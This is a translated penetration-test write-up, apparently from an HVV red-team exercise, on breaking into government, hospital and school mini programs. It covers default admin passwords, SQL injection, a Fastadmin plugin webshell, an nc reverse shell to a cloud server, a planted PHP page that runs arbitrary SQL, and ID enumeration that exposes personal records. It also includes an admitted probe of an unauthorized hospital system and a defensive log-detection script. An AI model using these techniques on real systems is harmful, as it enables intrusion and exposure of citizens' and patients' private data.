
Title: Summary of sharing cases for mini program management


0x00 Introduction

I just finished an HVV engagement in a certain place. Mini programs, being low-cost and easy-to-build information systems, have become a key new breakthrough target in HVV. The following cases all come from mini programs and are shared for everyone to learn from.

0x01 Case 1: A certain government affairs system

1. Weak password into the backend

Open the mini program, enter the citizen service, capture the mini program's domain name, and access the administrator backend directly. The page below is the Fastadmin framework.


There was a pitfall here for a long time: the login kept reporting the password as invalid. Just as I was about to give up, I clicked back to the previous step and was told that I was already logged in. Puzzled, I found that the token is refreshed after the system logs in, so the previous token gets used for the next login attempt, otherwise the password is reported as invalid. So the network or the system itself must have a delay, which meant the login request was not sent with the correct token. By the time I discovered this problem, I had already logged into the backend with admin/123456.


It contains nearly 20,000 citizen records, as well as hundreds of administrator accounts, and every one of those administrator accounts uses admin/123456. This is similar to the case four system in the prefecture-level city HVV | unauthorized access collection. (Damn it)


2. SQL injection is everywhere

The front-end business handling page sends the following request. Debug mode was not turned off, so the database account name and password were exposed. This SQL injection is very obvious, but at the time I was too pleased about the database credentials to bother with the injection. However, this database is not exposed externally and only accepts local connections, which is very annoying.


A time-based (delay) injection exists when viewing administrators in the backend.


3. Command execution takes the server and the database

Since it is Fastadmin, there are many ways to get a shell. This time I used the online command plug-in vulnerability to write a PHP webshell; it only exists in version 1.1.0.

However, this system is a secondary development, and there is no plug-in entry anywhere in the interface. I searched online for the plug-in page path to splice onto the URL.

The directory is: /addon?ref=addtabs

The plug-in directory should be /addon/command?ref=addtabs, but that page does not exist. I thought the route was not set up, so I shelved this, until my teammate found in an article that the command plug-in can be accessed directly, that is, the directory is /command?ref=addtabs


Click the one-click API document generation. The generated file is PHP, and the title field is written as a Trojan. Only a Behinder (Ice Scorpion) shell could be tested here. There have been similar cases before.


The Trojan connected successfully.


Uploading nc through the big webshell (大马) for privilege escalation, the shell was bounced back to a cloud server and root permissions were obtained.


The big webshell reports errors and garbled output when executing SQL statements.

I still remembered the database account and password, so I connected to the database by writing a PHP SQL-execution page myself, to prove that I had taken database permissions.


The code is as follows (the HTML and PHP tags were stripped in extraction and are restored here; the tag around each row was lost and is assumed to be pre, and a guard was added for statements that return no result set):

```php
<html>
<head>
<title>Execute MySQL statement</title>
</head>
<body>
<h1>Execute MySQL statement</h1>
<form method='POST' action=''>
<textarea name='sql_statement' rows='5' cols='50' placeholder='Please enter MySQL statement'></textarea>
<br>
<input type='submit' value='execute'>
</form>
<?php
// Check whether the form has been submitted
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Get the MySQL statement entered by the user
    $sql_statement = $_POST['sql_statement'];

    // Connect to the MySQL database (credentials left blank as in the original)
    $host = 'localhost';
    $username = '';
    $password = '';
    $database = '';
    $connection = mysqli_connect($host, $username, $password, $database);

    // Execute the MySQL query
    $result = mysqli_query($connection, $sql_statement);

    // Check the query result
    if ($result === false) {
        // Display the error message
        echo '<h2>Error:</h2>';
        echo '<p>' . mysqli_error($connection) . '</p>';
    } elseif ($result === true) {
        // INSERT/UPDATE/DELETE return true and have no rows to fetch
        echo '<p>Statement executed, affected rows: ' . mysqli_affected_rows($connection) . '</p>';
    } else {
        // Echo the query results row by row
        echo '<h2>Query result:</h2>';
        while ($row = mysqli_fetch_assoc($result)) {
            echo '<pre>';   // assumed: the wrapping tag was lost in extraction
            print_r($row);
            echo '</pre>';
        }
    }

    // Close the database connection
    mysqli_close($connection);
}
?>
</body>
</html>
```

0x02 Case 2: A county hospital database

1. SQL injection gives DBA

The hospital's SQL injection is in the official account registration. After logging in, I clicked on the registration record and captured a request containing the patient ID.


Adding a single quote produced an error; then order by.


I found that sqlmap could not run it directly, but the injection does exist. Discovering the ASP.NET framework means the target system is Windows.


I specified MySQL, Oracle and MSSQL as the database in turn. Finally the injection ran through with MSSQL, and it has DBA permissions.


I thought xp_cmdshell could execute commands, but unfortunately this is an HIS with protection in place; no matter how I set it up I could not execute commands, so I gave up and changed targets.

0x03 Case 3: A middle school visitor system

1. Unauthorized access + information leakage

Open the mini program, capture the traffic, and all the visitors' information comes back directly. One interface can be accessed without authorization.


This is what it looks like before logging in, so it is worth logging in as well.

After logging in, I added an access application.

Capture the request when viewing your own access application record.


Captured the following link: app/visitor/getVisitorInfo?viId=1. By traversing the id you can get hundreds of visitor records. I thought it was a horizontal privilege escalation (parallel overreach), and finally found that it is even accessible without authentication, with no permission check at all.


0x04 Case 4: One I got wrong

This case is quite funny. I was searching for a mini program, and one popped up whose name differed by one word. I started working on it without looking carefully. It is also a county hospital.

This should be a mini program built specially for nucleic acid testing appointments during the epidemic.

1. Horizontal privilege escalation + information leakage


If the ID card number and name do not match at login, verification fails, which means the ID card information inside is all real. After logging in, out of habit I looked for functions that carry a user ID, clicked the medical visit list and captured the request.


I found my own phone number, ID number, name and gender.


Modifying the id shows other people's information, more than 100,000 records in total, which is definitely horizontal privilege escalation.

2. Horizontal privilege escalation with SQL injection

Habitually adding a single quote produced an error straight away, and the page showed a SQL error. Isn't this exactly the edu SQL injection case shared in the last summary? Where there is horizontal privilege escalation there is a high probability that SQL injection exists as well. But I had picked the wrong target and had no authorization, so I stopped, gave up, and handed it over to the platform for future rectification.
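As an added defender-side example (not code from the original post), the detection logic below runs over constructed access-log lines and flags the two patterns seen in cases 3 and 4: one session walking sequential object ids on app/visitor/getVisitorInfo?viId=, and an id parameter carrying a quote character that produces a 500. The log format, the /api/patient/list path and the set of id-parameter names are assumptions.

```python
# Added example (not from the original post): flag IDOR enumeration and SQL-error
# probes in access logs. Log format and the /api/patient/list path are assumed;
# all log lines in SAMPLE_LOG are constructed.
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

LINE_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
                     r'(?P<status>\d{3}) \S+ sid=(?P<sid>\S+)$')
ID_PARAMS = {"viid", "id", "userid", "patientid"}  # assumed id-like parameter names
ENUM_THRESHOLD = 4                                   # distinct ids per session/endpoint
SQLI_PROBE = re.compile(r"['\"]|--|;")               # classic error-based probe characters

def parse_line(line):
    """Return (sid, path, status, {param: [values]}) or None for unparsable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    params = {k.lower(): v for k, v in parse_qs(parts.query).items()}
    return m["sid"], parts.path, m["status"], params

def analyze(lines):
    seen = defaultdict(set)  # (sid, path, param) -> distinct object ids requested
    alerts = []
    for sid, path, status, params in filter(None, map(parse_line, lines)):
        for name, values in params.items():
            if name not in ID_PARAMS:
                continue
            for v in values:
                if status == "500" and SQLI_PROBE.search(v):
                    alerts.append(("sqli_probe", sid, path, name, v))
                seen[(sid, path, name)].add(v)
    for (sid, path, name), ids in seen.items():
        if len(ids) >= ENUM_THRESHOLD:
            nums = sorted(int(i) for i in ids if i.isdigit())
            sequential = len(nums) > 1 and nums == list(range(nums[0], nums[0] + len(nums)))
            alerts.append(("idor_enum", sid, path, name, len(ids), sequential))
    return alerts

SAMPLE_LOG = """\
10.0.0.5 - - [05/Aug/2023:00:44:01 +0800] "GET /app/visitor/getVisitorInfo?viId=1 HTTP/1.1" 200 512 sid=s1
10.0.0.5 - - [05/Aug/2023:00:44:02 +0800] "GET /app/visitor/getVisitorInfo?viId=2 HTTP/1.1" 200 498 sid=s1
10.0.0.5 - - [05/Aug/2023:00:44:03 +0800] "GET /app/visitor/getVisitorInfo?viId=3 HTTP/1.1" 200 505 sid=s1
10.0.0.5 - - [05/Aug/2023:00:44:04 +0800] "GET /app/visitor/getVisitorInfo?viId=4 HTTP/1.1" 200 501 sid=s1
10.0.0.9 - - [05/Aug/2023:01:03:10 +0800] "GET /api/patient/list?id=77 HTTP/1.1" 200 300 sid=s2
10.0.0.9 - - [05/Aug/2023:01:03:15 +0800] "GET /api/patient/list?id=77%27 HTTP/1.1" 500 120 sid=s2
10.0.0.7 - - [05/Aug/2023:01:10:00 +0800] "GET /app/visitor/getVisitorInfo?viId=42 HTTP/1.1" 200 510 sid=s3
""".splitlines()
```

Running `analyze(SAMPLE_LOG)` yields one `idor_enum` alert for session s1 (four sequential ids) and one `sqli_probe` alert for session s2; session s3, which fetched a single record, is not flagged.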


Original link: https://forum.butian.net/share/2400
